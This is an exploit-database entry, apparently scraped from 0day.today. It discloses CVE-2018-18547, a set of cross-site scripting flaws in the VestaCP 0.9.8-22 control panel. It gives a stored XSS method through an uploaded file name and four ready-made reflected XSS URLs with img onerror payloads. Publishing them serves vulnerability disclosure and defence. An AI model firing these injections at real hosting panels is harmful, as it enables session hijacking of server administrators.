Lucene search
InfinitumIT1337DAY-ID-31391HistoryOct 23, 2018 - 12:00 a.m.
VestaCP 0.9.8-22 Cross Site Scripting Vulnerability
2018-10-2300:00:00
InfinitumIT
0day.today
28
0.003 Low
EPSS
Percentile
68.3%
Exploit for php platform in category web applications
[+] Title: VestaCP Multiple XSS Vulnerabilities <= v0.9.8-22
[+] Author: Numan OZDEMIR (https://infinitumit.com.tr)
[+] Vendor Homepage: vestacp.com
[+] Version: Up to v0.9.8-22.
[+] CVE: CVE-2018-18547
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs
[+] [email protected] - [email protected]
[~] Description:
Insert any XSS payload. I will use <img src onerror=alert(1337)>
https://IP:8083/list/directory/
-> Stored XSS:
A visitor may upload a file as named xss payload, using any form in your
website.
If VestaCP user see this file in the interface, his browser will run the
JavaScript.
So this vulnerability makes high risk.
https://IP:8083/edit/web/?domain=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS
https://IP:8083/list/backup/?backup=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS
https://IP:8083/list/rrd/?period=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS
https://IP:8083/list/directory/?dir_a=">alert(1337);//
-> Reflected XSS
// for secure days...
# 0day.today [2018-10-24] #Related
cvelist
cvelist
CVE-2018-18547
2018-10-24 21:00:00
nvd
nvd
CVE-2018-18547
2018-10-24 21:29:01
cve
cve
CVE-2018-18547
2018-10-24 21:29:01
prion
prion
Design/Logic Flaw
2018-10-24 21:29:00
packetstorm
packetstorm
VestaCP 0.9.8-22 Cross Site Scripting
2018-10-22 00:00:00